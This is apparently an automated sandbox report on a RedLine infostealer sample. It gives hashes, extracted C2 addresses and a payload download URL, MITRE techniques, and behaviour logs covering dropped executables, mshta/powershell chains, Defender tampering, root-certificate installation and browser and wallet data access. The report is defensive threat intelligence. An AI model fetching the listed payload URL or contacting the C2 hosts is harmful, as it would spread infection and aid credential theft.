redline | 041fa6acb0d512cd68e538d2e4bd11a9a1345839d3803ec8c096862eafc0cd81

Analysis

max time kernel
152s
max time network
155s
platform
windows7_x64
resource
win7v20210408
submitted
14-08-2021 23:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

574843CE13304217F897E35CCFA66118.exe
Size

1.6MB
MD5

574843ce13304217f897e35ccfa66118
SHA1

19671765f1d4db74a1a9bca2911ff8f3d9633a81
SHA256

041fa6acb0d512cd68e538d2e4bd11a9a1345839d3803ec8c096862eafc0cd81
SHA512

3d344e2208a0b00775b64cc897cd47d29b507f7da2416270cd3b2594a3379b12786ad29c14682259843ce0a1f176d15fa7406639ba11f71e1d01a1899be04427

Score

10^/10

redline ruz usacash888 discovery evasion infostealer spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/thereopportunity/en-en/downloads/Shtate.txt

Extracted

Family

redline

Botnet

usacash888

185.53.46.25:38743

Extracted

Family

redline

Botnet

Ruz

sandedean.xyz:80

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/960-89-0x00000000022D0000-0x00000000022FE000-memory.dmp	family_redline
behavioral1/memory/1260-92-0x0000000002340000-0x000000000235D000-memory.dmp	family_redline
behavioral1/memory/960-93-0x0000000002300000-0x0000000002319000-memory.dmp	family_redline
behavioral1/memory/1260-94-0x00000000023B0000-0x00000000023CB000-memory.dmp	family_redline

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata

Core1 .NET packer 1 IoCs

Detects packer/loader used by .NET malware.

Processes:

resource	yara_rule
behavioral1/memory/960-89-0x00000000022D0000-0x00000000022FE000-memory.dmp	Core1

CustAttr .NET packer 1 IoCs

Detects CustAttr .NET packer in memory.

Processes:

resource	yara_rule
behavioral1/memory/1320-112-0x0000000000550000-0x000000000055B000-memory.dmp	CustAttr

Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

18 1588 mshta.exe
19 1588 mshta.exe
21 1588 mshta.exe
23 1588 mshta.exe
26 1116 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

u3ZeL2sANA3zIjlJQa8NpwSJ.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts u3ZeL2sANA3zIjlJQa8NpwSJ.exe

flow	pid	process
18	1588	mshta.exe
19	1588	mshta.exe
21	1588	mshta.exe
23	1588	mshta.exe
26	1116	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	u3ZeL2sANA3zIjlJQa8NpwSJ.exe

Executes dropped EXE 7 IoCs

Processes:

9Hg6BlLRv6O3AL82cqOOLtSW.exeYbZla9boZS8ZYWAt5NpHHnn3.exeqthY1sIGoppDA_PNjZ_eNt_d.exeOH9s57nexSIpildEULBjQDQ9.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exe

pid	process
1128	9Hg6BlLRv6O3AL82cqOOLtSW.exe
764	YbZla9boZS8ZYWAt5NpHHnn3.exe
1260	qthY1sIGoppDA_PNjZ_eNt_d.exe
960	OH9s57nexSIpildEULBjQDQ9.exe
1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
1080	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
2024	u3ZeL2sANA3zIjlJQa8NpwSJ.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

574843CE13304217F897E35CCFA66118.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\International\Geo\Nation	574843CE13304217F897E35CCFA66118.exe

Loads dropped DLL 6 IoCs

Processes:

574843CE13304217F897E35CCFA66118.exe

pid	process
1628	574843CE13304217F897E35CCFA66118.exe
1628	574843CE13304217F897E35CCFA66118.exe
1628	574843CE13304217F897E35CCFA66118.exe
1628	574843CE13304217F897E35CCFA66118.exe
1628	574843CE13304217F897E35CCFA66118.exe
1628	574843CE13304217F897E35CCFA66118.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2 ipinfo.io
3 ipinfo.io
Suspicious use of SetThreadContext 1 IoCs

Processes:

u3ZeL2sANA3zIjlJQa8NpwSJ.exe

description pid process target process

PID 1320 set thread context of 2024 1320 u3ZeL2sANA3zIjlJQa8NpwSJ.exe u3ZeL2sANA3zIjlJQa8NpwSJ.exe

flow	ioc
2	ipinfo.io
3	ipinfo.io

description	pid	process	target process
PID 1320 set thread context of 2024	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe

Drops file in Program Files directory 2 IoCs

Processes:

u3ZeL2sANA3zIjlJQa8NpwSJ.exe

description	ioc	process
File created	C:\Program Files\Mozilla Firefox\DotNetZip-fzzv5jsb.tmp	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\resources.pak	u3ZeL2sANA3zIjlJQa8NpwSJ.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1992 taskkill.exe
1712 taskkill.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

pid	process
1992	taskkill.exe
1712	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 2 IoCs

Processes:

firefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe574843CE13304217F897E35CCFA66118.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	574843CE13304217F897E35CCFA66118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	574843CE13304217F897E35CCFA66118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	mshta.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

574843CE13304217F897E35CCFA66118.exepowershell.exeOH9s57nexSIpildEULBjQDQ9.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exechrome.exechrome.exechrome.exe

pid	process
1628	574843CE13304217F897E35CCFA66118.exe
1116	powershell.exe
1116	powershell.exe
960	OH9s57nexSIpildEULBjQDQ9.exe
960	OH9s57nexSIpildEULBjQDQ9.exe
1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
2024	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
2024	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
1652	chrome.exe
972	chrome.exe
972	chrome.exe
3336	chrome.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeOH9s57nexSIpildEULBjQDQ9.exeqthY1sIGoppDA_PNjZ_eNt_d.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exetaskkill.exetaskkill.exefirefox.exe

description	pid	process
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeDebugPrivilege	960	OH9s57nexSIpildEULBjQDQ9.exe
Token: SeDebugPrivilege	1260	qthY1sIGoppDA_PNjZ_eNt_d.exe
Token: SeDebugPrivilege	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
Token: SeDebugPrivilege	2024	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	1872	firefox.exe
Token: SeDebugPrivilege	1872	firefox.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

chrome.exefirefox.exe

pid process

972 chrome.exe
1872 firefox.exe
1872 firefox.exe
1872 firefox.exe
972 chrome.exe
972 chrome.exe
1872 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

1872 firefox.exe
1872 firefox.exe
1872 firefox.exe

pid	process
972	chrome.exe
1872	firefox.exe
1872	firefox.exe
1872	firefox.exe
972	chrome.exe
972	chrome.exe
1872	firefox.exe

pid	process
1872	firefox.exe
1872	firefox.exe
1872	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

574843CE13304217F897E35CCFA66118.exe9Hg6BlLRv6O3AL82cqOOLtSW.exemshta.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exeu3ZeL2sANA3zIjlJQa8NpwSJ.exefirefox.exe

description	pid	process	target process
PID 1628 wrote to memory of 1128	1628	574843CE13304217F897E35CCFA66118.exe	9Hg6BlLRv6O3AL82cqOOLtSW.exe
PID 1628 wrote to memory of 1128	1628	574843CE13304217F897E35CCFA66118.exe	9Hg6BlLRv6O3AL82cqOOLtSW.exe
PID 1628 wrote to memory of 1128	1628	574843CE13304217F897E35CCFA66118.exe	9Hg6BlLRv6O3AL82cqOOLtSW.exe
PID 1628 wrote to memory of 1128	1628	574843CE13304217F897E35CCFA66118.exe	9Hg6BlLRv6O3AL82cqOOLtSW.exe
PID 1628 wrote to memory of 764	1628	574843CE13304217F897E35CCFA66118.exe	YbZla9boZS8ZYWAt5NpHHnn3.exe
PID 1628 wrote to memory of 764	1628	574843CE13304217F897E35CCFA66118.exe	YbZla9boZS8ZYWAt5NpHHnn3.exe
PID 1628 wrote to memory of 764	1628	574843CE13304217F897E35CCFA66118.exe	YbZla9boZS8ZYWAt5NpHHnn3.exe
PID 1628 wrote to memory of 764	1628	574843CE13304217F897E35CCFA66118.exe	YbZla9boZS8ZYWAt5NpHHnn3.exe
PID 1628 wrote to memory of 960	1628	574843CE13304217F897E35CCFA66118.exe	OH9s57nexSIpildEULBjQDQ9.exe
PID 1628 wrote to memory of 960	1628	574843CE13304217F897E35CCFA66118.exe	OH9s57nexSIpildEULBjQDQ9.exe
PID 1628 wrote to memory of 960	1628	574843CE13304217F897E35CCFA66118.exe	OH9s57nexSIpildEULBjQDQ9.exe
PID 1628 wrote to memory of 960	1628	574843CE13304217F897E35CCFA66118.exe	OH9s57nexSIpildEULBjQDQ9.exe
PID 1628 wrote to memory of 1260	1628	574843CE13304217F897E35CCFA66118.exe	qthY1sIGoppDA_PNjZ_eNt_d.exe
PID 1628 wrote to memory of 1260	1628	574843CE13304217F897E35CCFA66118.exe	qthY1sIGoppDA_PNjZ_eNt_d.exe
PID 1628 wrote to memory of 1260	1628	574843CE13304217F897E35CCFA66118.exe	qthY1sIGoppDA_PNjZ_eNt_d.exe
PID 1628 wrote to memory of 1260	1628	574843CE13304217F897E35CCFA66118.exe	qthY1sIGoppDA_PNjZ_eNt_d.exe
PID 1628 wrote to memory of 1320	1628	574843CE13304217F897E35CCFA66118.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1628 wrote to memory of 1320	1628	574843CE13304217F897E35CCFA66118.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1628 wrote to memory of 1320	1628	574843CE13304217F897E35CCFA66118.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1628 wrote to memory of 1320	1628	574843CE13304217F897E35CCFA66118.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1128 wrote to memory of 1588	1128	9Hg6BlLRv6O3AL82cqOOLtSW.exe	mshta.exe
PID 1128 wrote to memory of 1588	1128	9Hg6BlLRv6O3AL82cqOOLtSW.exe	mshta.exe
PID 1128 wrote to memory of 1588	1128	9Hg6BlLRv6O3AL82cqOOLtSW.exe	mshta.exe
PID 1588 wrote to memory of 1116	1588	mshta.exe	powershell.exe
PID 1588 wrote to memory of 1116	1588	mshta.exe	powershell.exe
PID 1588 wrote to memory of 1116	1588	mshta.exe	powershell.exe
PID 1320 wrote to memory of 1080	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1320 wrote to memory of 1080	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1320 wrote to memory of 1080	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1320 wrote to memory of 1080	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1320 wrote to memory of 2024	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1320 wrote to memory of 2024	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
PID 1320 wrote to memory of 2024	1320	u3ZeL2sANA3zIjlJQa8NpwSJ.exe	u3ZeL2sANA3zIjlJQa8NpwSJ.exe
